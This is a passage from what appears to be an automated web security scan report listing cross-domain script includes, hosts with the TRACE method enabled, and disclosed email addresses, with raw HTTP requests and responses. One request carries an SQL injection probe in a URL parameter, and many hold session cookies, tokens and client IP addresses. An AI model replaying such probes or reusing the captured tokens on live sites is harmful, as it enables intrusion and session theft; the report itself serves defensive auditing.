Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:25:09 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 21:23:13 GMT
ETag: "4b825d-23b49-f4b4d240"
Accept-Ranges: bytes
Content-Length: 146249
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*Copyright 2000-2010,Coremetrics 4.7.7H $Revision: $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="99999999";}if(!cm_HOST){var cm_HOST="testdata.coremetrics.com/cm?";}if(!cm_ClientTS){var
...[SNIP]...
=== "testdata.coremetrics.com")) {
           cm_Production_HOST = "data.coremetrics.com";
       }
       cm_HOST += "/cm?";
   }

   if (cookieDomain) {
       cm_JSFPCookieDomain=cookieDomain;
   }

   document.write('<script language="javascript1.2" src="//libs.coremetrics.com/configs/' + cm_ClientID.split(";",1) + '.js"></script>
...[SNIP]...
21.58. https://www.territoryahead.com/text/js/displayfunctions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /text/js/displayfunctions.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /text/js/displayfunctions.js HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:16 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:30:28 GMT
ETag: "d4c465-16b9-9b2f1500"
Accept-Ranges: bytes
Content-Length: 5817
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

<!--

var TTA_PATHNAME = document.location.pathname.toLowerCase();
var TTA_URL_PATH = "" + document.location.href.toLowerCase();

/* grab the page name from the url */
var sPath = window.locati
...[SNIP]...
onversion_label = "nBcyCJiEygEQqOW-_gM";
   var google_conversion_value = 0;
   var Total_Cost = val;

   if (Total_Cost) {
   google_conversion_value = Total_Cost;
   }
/* ]]> */

   document.writeln("<script type='text/javascript' src='https://www.googleadservices.com/pagead/conversion.js'></script>
...[SNIP]...
21.59. http://www.vcahospitals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response

HTTP/1.1 302 Found
Date: Fri, 25 Mar 2011 19:13:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=f4tq018eii0u9s0oeijn0hk6n0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...
22. TRACE method is enabled  previous  next
There are 21 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

22.1. http://ads.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: f4c4faf3af8f25c8

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 26 Mar 2011 20:36:20 GMT
Content-Type: message/http
Content-Length: 1295
Expires: Sat, 26 Mar 2011 20:36:20 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: f4c4faf3af8f25c8; KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBC
...[SNIP]...
22.2. http://b.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: b.aol.com
Cookie: c67c6fc0470bdbd8

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: b.aol.com
Cookie: c67c6fc0470bdbd8; MUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.6ef0; s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1300982991291-Repeat%7C1364054991291%3B%20s_nrgvo%3DRepeat%7C1364054991293%3B
...[SNIP]...
22.3. http://dominionenterprises.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: dominionenterprises.112.2o7.net
Cookie: 976469c77c56afb2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:29 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dominionenterprises.112.2o7.net
Cookie: 976469c77c56afb2; s_vi=[CS]v1|26C674AA85010E18-4000010D8000F523[CE]; s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|
...[SNIP]...
22.4. http://entry-stats.huffpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entry-stats.huffpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: entry-stats.huffpost.com
Cookie: 72fa69c3a35020fa

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: entry-stats.huffpost.com
Cookie: 72fa69c3a35020fa

22.5. http://image3.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image3.pubmatic.com
Cookie: b1916fe33818f11b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image3.pubmatic.com
Cookie: b1916fe33818f11b; KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBC
...[SNIP]...
22.6. http://music.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: music.aol.com
Cookie: 3bd599deb709ca26

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:21 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: music.aol.com
Cookie: 3bd599deb709ca26; s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x
...[SNIP]...
22.7. http://o.sa.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: o.sa.aol.com
Cookie: e5caee2a93a29e3e

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:55 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: o.sa.aol.com
Cookie: e5caee2a93a29e3e; s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_03231
...[SNIP]...
22.8. http://pixel.1und1.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.1und1.de
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.1und1.de
Cookie: beb1ca81b23b172c

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 20:43:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.1und1.de
Cookie: beb1ca81b23b172c; __session=195b98af8336d477cea96538af260d7f

22.9. http://ptrack.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ptrack.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ptrack.pubmatic.com
Cookie: 1a56485b6c470f5e

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:20 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ptrack.pubmatic.com
Cookie: 1a56485b6c470f5e; KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBC
...[SNIP]...
22.10. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 350d93c823eaeb60

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 350d93c823eaeb60; V5=AStfNj8CBxcDFT8VChwjIywOBg0NWlInHlI6SA__; IMRID=TVvOxawVaBsAAEzNbo8
Host: secure-us.imrworldwide.com

22.11. http://tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: 89234f604d99fb27

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 89234f604d99fb27; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776586; Tsid=0^1301171786^1301173586|16768^1301171786^1301173586; TData=99999|^|61674|60739|60489|60740|6
...[SNIP]...
22.12. http://texasgroup.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://texasgroup.net
Path:   /

Request

TRACE / HTTP/1.0
Host: texasgroup.net
Cookie: af9593829c6d0b94

Response

HTTP/1.1 200 OK
Date: Sun, 27 Mar 2011 22:56:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: af9593829c6d0b94
Host: texasgroup.net

22.13. http://www.aamrafitness.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamrafitness.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aamrafitness.com
Cookie: 6a0f3ad81cb38320

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 00:53:16 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6a0f3ad81cb38320
Host: www.aamrafitness.com

22.14. http://www.aamranetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamranetworks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aamranetworks.com
Cookie: 3e1823de0e2f2de4

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 01:19:58 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3e1823de0e2f2de4
Host: www.aamranetworks.com

22.15. http://www.aamraoutsourcing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamraoutsourcing.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aamraoutsourcing.com
Cookie: 753c3a3743c8194

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 00:53:45 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 753c3a3743c8194
Host: www.aamraoutsourcing.com

22.16. http://www.aamraresources.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamraresources.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aamraresources.com
Cookie: 3c26610ea958757

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 00:51:54 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3c26610ea958757
Host: www.aamraresources.com

22.17. http://www.aim.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aim.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 4b63d3517029690a

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 4b63d3517029690a
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243

22.18. http://www.bluestarfibres.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluestarfibres.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bluestarfibres.com
Cookie: 19ca9c7d93a8cfcd

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 19ca9c7d93a8cfcd
Host: www.bluestarfibres.com

22.19. http://www.citysbest.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 96aab647542653c3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 96aab647542653c3; GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:2:20:41C9:20
...[SNIP]...
22.20. http://www.nutter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nutter.com
Cookie: 154322802368227b

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 154322802368227b
Host: www.nutter.com

22.21. http://www.vcahospitals.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vcahospitals.com
Cookie: ea7ce9d2188d641f

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vcahospitals.com
Cookie: ea7ce9d2188d641f; PHPSESSID=f4tq018eii0u9s0oeijn0hk6n0; __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDj
...[SNIP]...
23. Email addresses disclosed  previous  next
There are 65 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

23.1. http://advertising.microsoft.com/search-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /search-advertising

Issue detail

The following email address was disclosed in the response:

Request

GET /search-advertising?s_cid=us_bing_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 00:58:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_bing_footer; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:44 GMT
Content-Length: 59618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<a href="mailto:nzsales@ninemsn.com.au" title="mailto:nzsales@ninemsn.com.au" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: New Zealand" omniture_products="market selector" target="_blank">
...[SNIP]...
23.2. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /utility/js/omni_rsid_msdn_current.js

Issue detail

The following email address was disclosed in the response:

Request

GET /utility/js/omni_rsid_msdn_current.js HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:14 GMT
Accept-Ranges: bytes
ETag: "6485d5ad62becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Feb+2011+07%3a45%3a50+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a38+GMT; expires=Sun, 25-Mar-2012 01:34:38 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:38 GMT
Content-Length: 73913

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
//        omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...
23.3. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /utility/js/omni_rsid_technet_current.js

Issue detail

The following email address was disclosed in the response:

Request

GET /utility/js/omni_rsid_technet_current.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:15 GMT
Accept-Ranges: bytes
ETag: "80ad44ae62becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; expires=Sun, 25-Mar-2012 01:34:31 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:48 GMT
Content-Length: 73916

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
//        omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...
23.4. http://forums.smartertools.com/t/33246.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /t/33246.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /t/33246.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/12.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
